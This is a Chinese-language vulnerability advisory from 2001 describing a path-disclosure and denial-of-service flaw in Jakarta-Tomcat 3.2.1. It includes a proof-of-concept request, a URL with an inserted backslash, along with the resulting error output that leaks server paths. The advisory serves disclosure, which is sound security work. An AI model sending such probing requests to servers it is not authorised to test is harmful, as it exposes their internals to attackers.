Jakarta-Tomcat v3.2.1 存在目录泄露和拒绝服务攻击发布时间:2001-08-18 更新时间:2001-08-18 严重程度:中 威胁程度:服务器信息泄露 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Jakarta-Tomcat v3.2.1详细描述 Tomcat v3.2.1 存在目录泄露问题,通过请求带'\'的URL请求, 可以泄露服务器的物理路径: http://host/\index.jsp Error: 500 Location: /index.jsp Internal Servlet Error: org.apache.jasper.JasperException: Unable to compile class for JSP C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:482: Method autenticate(java.lang.String) not found in class ENTERPRISE.login. if(pubBean.autenticate(password) != 0) ^ C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:664: Method Others methods... 而且类似上面的多种请求可以导致拒绝服务攻击。 测试代码 见描述部分。 解决方案 尚无 相关信息 Efrain 'ET' Torres [LoWNOISE] Colombia et@cyberspace.org |
